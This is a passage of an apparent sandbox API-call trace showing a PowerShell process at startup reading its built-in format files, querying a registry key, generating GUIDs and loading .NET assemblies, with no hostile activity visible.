lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0090.656] SetErrorMode (uMode=0x1) returned 0x1 [0090.656] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0090.656] SetErrorMode (uMode=0x1) returned 0x1 [0090.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0090.657] SetErrorMode (uMode=0x1) returned 0x1 [0090.657] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0090.657] SetErrorMode (uMode=0x1) returned 0x1 [0090.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0090.657] SetErrorMode (uMode=0x1) returned 0x1 [0090.657] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0090.657] SetErrorMode (uMode=0x1) returned 0x1 [0090.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0090.657] SetErrorMode (uMode=0x1) returned 0x1 [0090.657] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0090.658] SetErrorMode (uMode=0x1) returned 0x1 [0090.659] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.659] CoTaskMemFree (pv=0x2e4450) [0090.671] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.671] CoTaskMemFree (pv=0x2e4450) [0090.673] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.673] CoTaskMemFree (pv=0x2e4450) [0090.675] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.675] CoTaskMemFree (pv=0x2e4450) [0090.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.676] SetErrorMode (uMode=0x1) returned 0x1 [0090.676] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0090.677] GetFileType (hFile=0x314) returned 0x1 [0090.677] SetErrorMode (uMode=0x1) returned 0x1 [0090.677] GetFileType (hFile=0x314) returned 0x1 [0090.677] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.680] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.681] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.681] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.682] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.682] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.682] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x9e2, lpOverlapped=0x0) returned 1 [0090.683] ReadFile (in: hFile=0x314, lpBuffer=0x343fc52, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x343fc52*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.683] ReadFile (in: hFile=0x314, lpBuffer=0x3440708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3440708*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.683] CloseHandle (hObject=0x314) returned 1 [0090.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.683] SetErrorMode (uMode=0x1) returned 0x1 [0090.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0090.684] SetErrorMode (uMode=0x1) returned 0x1 [0090.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.684] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0 [0090.684] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0090.684] CoTaskMemAlloc (cb=0x5a) returned 0x30b880 [0090.684] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30b880, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0090.684] CoTaskMemFree (pv=0x30b880) [0090.685] RegCloseKey (hKey=0x314) returned 0x0 [0090.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.695] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xaec86c76, Data2=0x6d4c, Data3=0x4425, Data4=([0]=0x9f, [1]=0x7a, [2]=0xcd, [3]=0x84, [4]=0xb0, [5]=0xf, [6]=0xaa, [7]=0xac))) returned 0x0 [0090.708] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xaa57d90a, Data2=0xc885, Data3=0x40bc, Data4=([0]=0xb0, [1]=0x62, [2]=0xb5, [3]=0xb6, [4]=0xaa, [5]=0x2d, [6]=0xaf, [7]=0x9a))) returned 0x0 [0090.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0090.712] SetErrorMode (uMode=0x1) returned 0x1 [0090.712] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0090.712] GetFileType (hFile=0x314) returned 0x1 [0090.712] SetErrorMode (uMode=0x1) returned 0x1 [0090.712] GetFileType (hFile=0x314) returned 0x1 [0090.713] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.714] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.715] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.716] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.716] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.718] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0xfb2, lpOverlapped=0x0) returned 1 [0090.719] ReadFile (in: hFile=0x314, lpBuffer=0x346a98a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346a98a*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.719] ReadFile (in: hFile=0x314, lpBuffer=0x346b270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x346b270*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.719] CloseHandle (hObject=0x314) returned 1 [0090.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0090.719] SetErrorMode (uMode=0x1) returned 0x1 [0090.719] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0090.719] SetErrorMode (uMode=0x1) returned 0x1 [0090.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0090.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0 [0090.720] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0090.720] CoTaskMemAlloc (cb=0x5a) returned 0x30be30 [0090.720] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30be30, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0090.720] CoTaskMemFree (pv=0x30be30) [0090.720] RegCloseKey (hKey=0x314) returned 0x0 [0090.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0090.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0090.724] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5d583804, Data2=0xf2cc, Data3=0x417e, Data4=([0]=0xbf, [1]=0x66, [2]=0x32, [3]=0xd9, [4]=0x2b, [5]=0xb1, [6]=0xa, [7]=0xe3))) returned 0x0 [0090.729] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xe3ed4aed, Data2=0xf8a0, Data3=0x435b, Data4=([0]=0xbe, [1]=0x15, [2]=0x5d, [3]=0xd7, [4]=0x87, [5]=0x62, [6]=0xea, [7]=0x4e))) returned 0x0 [0090.730] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x7d297f7c, Data2=0x827c, Data3=0x4e68, Data4=([0]=0xa2, [1]=0x33, [2]=0x39, [3]=0x39, [4]=0xac, [5]=0x7d, [6]=0x63, [7]=0x7a))) returned 0x0 [0090.731] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xf5bf1d3f, Data2=0xe4e9, Data3=0x4967, Data4=([0]=0x92, [1]=0x3d, [2]=0x2c, [3]=0x74, [4]=0xee, [5]=0xa3, [6]=0xba, [7]=0x55))) returned 0x0 [0090.731] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x77cfee4d, Data2=0x139e, Data3=0x47dd, Data4=([0]=0x87, [1]=0x88, [2]=0x3a, [3]=0x53, [4]=0x2f, [5]=0xa7, [6]=0xbd, [7]=0xc7))) returned 0x0 [0090.732] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xacaa4e0, Data2=0x73e3, Data3=0x4e71, Data4=([0]=0xb9, [1]=0xef, [2]=0x5f, [3]=0x21, [4]=0xb7, [5]=0xec, [6]=0x2b, [7]=0x99))) returned 0x0 [0090.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.733] SetErrorMode (uMode=0x1) returned 0x1 [0090.733] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0090.733] GetFileType (hFile=0x314) returned 0x1 [0090.733] SetErrorMode (uMode=0x1) returned 0x1 [0090.733] GetFileType (hFile=0x314) returned 0x1 [0090.734] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.736] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.736] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.737] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.738] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.739] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.739] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0xaca, lpOverlapped=0x0) returned 1 [0090.739] ReadFile (in: hFile=0x314, lpBuffer=0x34b6602, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6602*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.739] ReadFile (in: hFile=0x314, lpBuffer=0x34b6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x34b6fd0*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.739] CloseHandle (hObject=0x314) returned 1 [0090.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.740] SetErrorMode (uMode=0x1) returned 0x1 [0090.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0090.740] SetErrorMode (uMode=0x1) returned 0x1 [0090.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.740] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0 [0090.740] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0090.740] CoTaskMemAlloc (cb=0x5a) returned 0x30be30 [0090.740] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30be30, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0090.740] CoTaskMemFree (pv=0x30be30) [0090.741] RegCloseKey (hKey=0x314) returned 0x0 [0090.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0090.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0090.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 